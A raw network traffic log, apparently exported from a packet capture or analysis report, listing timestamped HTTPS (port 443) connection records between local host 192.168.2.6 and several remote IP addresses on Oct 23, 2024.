                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.001553059 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.001821041 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.004447937 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.004492998 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.004542112 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.004563093 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.004601002 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.004601002 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.013430119 CEST49841443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.013437986 CEST44349841141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.014763117 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.014838934 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.014898062 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.014954090 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.014960051 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.014997959 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.015077114 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.015125036 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.015342951 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.015353918 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.018454075 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.018502951 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.018558025 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.022944927 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.022964954 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.055195093 CEST49841443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.082262039 CEST44349841141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.082328081 CEST44349841141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.082351923 CEST44349841141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.082376957 CEST49841443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.082385063 CEST44349841141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.082449913 CEST49841443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.082942009 CEST44349841141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.082978010 CEST44349841141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.083025932 CEST49841443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.083031893 CEST44349841141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.083084106 CEST44349841141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.083154917 CEST49841443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.086572886 CEST49841443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.086587906 CEST44349841141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.092724085 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.092784882 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.092855930 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.093103886 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.093121052 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.095035076 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.095076084 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.095144987 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.095374107 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.095390081 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.120462894 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.120522976 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.120574951 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.120584965 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.120599031 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.120680094 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.120687962 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.136796951 CEST4434984213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.136861086 CEST4434984313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.137269974 CEST49843443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.137309074 CEST49842443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.137329102 CEST4434984313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.137357950 CEST4434984213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.137664080 CEST49842443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.137680054 CEST4434984213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.137797117 CEST49843443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.137813091 CEST4434984313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.141608953 CEST4434984413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.141949892 CEST49844443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.141976118 CEST4434984413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.142291069 CEST49844443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.142307043 CEST4434984413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.163781881 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.180022955 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.180356026 CEST49845443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.180387020 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.180656910 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.181269884 CEST49845443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.181329012 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.181482077 CEST49845443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.200272083 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.200340033 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.200359106 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.200368881 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.200412989 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.200412989 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.223165989 CEST49834443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.223187923 CEST44349834141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.223337889 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.240801096 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.240876913 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.240931034 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.240940094 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.240953922 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.240974903 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.241004944 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.241111040 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.241400003 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.241410017 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.241455078 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.272727966 CEST4434984213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.273188114 CEST4434984213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.273250103 CEST49842443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.273334026 CEST49842443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.273334026 CEST49842443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.273379087 CEST4434984213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.273407936 CEST4434984213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.276704073 CEST4434984413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.277328014 CEST4434984413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.277395964 CEST49844443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.277870893 CEST4434984313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.278270960 CEST4434984313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.278273106 CEST49860443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.278285980 CEST4434986013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.278337955 CEST49843443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.278356075 CEST49860443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.278393984 CEST49844443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.278413057 CEST4434984413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.278425932 CEST49844443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.278433084 CEST4434984413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.279076099 CEST49860443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.279089928 CEST4434986013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.279160023 CEST49843443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.279160976 CEST49843443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.279211044 CEST4434984313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.279242992 CEST4434984313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.280997038 CEST49861443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.281032085 CEST4434986113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.281096935 CEST49862443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.281097889 CEST49861443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.281106949 CEST4434986213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.281155109 CEST49862443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.281250000 CEST49861443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.281275988 CEST4434986113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.281308889 CEST49862443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.281322002 CEST4434986213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.314331055 CEST4434984613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.314774990 CEST49846443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.314799070 CEST4434984613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.315166950 CEST49846443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.315176010 CEST4434984613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.319009066 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.319039106 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.319102049 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.319122076 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.319309950 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.319309950 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.348911047 CEST4434984813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.349322081 CEST49848443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.349369049 CEST4434984813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.349807978 CEST49848443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.349818945 CEST4434984813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.359951019 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.360017061 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.360085964 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.360085964 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.360095024 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.360143900 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.362013102 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.362134933 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.362190008 CEST49845443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.362206936 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.362283945 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.362328053 CEST49845443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.362335920 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.362593889 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.362638950 CEST49845443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.363320112 CEST49845443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.363334894 CEST44349845141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.409606934 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.409914017 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.409929037 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.411012888 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.411685944 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.411829948 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.411834955 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.411854982 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.437727928 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.437784910 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.437860966 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.437860966 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.437885046 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.438173056 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.447478056 CEST4434984613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.447644949 CEST4434984613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.447696924 CEST49846443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.447890997 CEST49846443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.447890997 CEST49846443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.447905064 CEST4434984613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.447916031 CEST4434984613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.450242996 CEST49864443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.450292110 CEST4434986413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.450387955 CEST49864443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.450520039 CEST49864443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.450537920 CEST4434986413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.456963062 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.488259077 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.488312960 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.488363028 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.488373995 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.488413095 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.488459110 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.488467932 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.489598989 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.489650965 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.489681005 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.489690065 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.489753008 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.490221024 CEST4434984813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.490376949 CEST4434984813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.490433931 CEST49848443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.493402958 CEST49848443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.493444920 CEST4434984813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.496804953 CEST49865443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.496836901 CEST4434986513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.496895075 CEST49865443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.497297049 CEST49865443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.497313023 CEST4434986513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.528188944 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.528564930 CEST49852443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.528650045 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.528980970 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.529371023 CEST49852443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.529433012 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.529516935 CEST49852443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.540920973 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.543132067 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.544871092 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.544898987 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.545356035 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.545759916 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.545855045 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.546047926 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.552062988 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.552292109 CEST49854443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.552326918 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.553440094 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.553741932 CEST49854443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.553862095 CEST49854443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.553874016 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.553932905 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.554951906 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555038929 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555083036 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555087090 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555104017 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555145025 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555147886 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555160999 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555208921 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555214882 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555288076 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555332899 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555335999 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555345058 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.555391073 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.571347952 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.587605000 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.587621927 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.597790003 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.597845078 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.597918987 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.597933054 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.597945929 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.597982883 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.597990990 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.599073887 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.599123001 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.599173069 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.599173069 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.599184990 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.599200010 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.603643894 CEST49854443192.168.2.6141.193.213.10
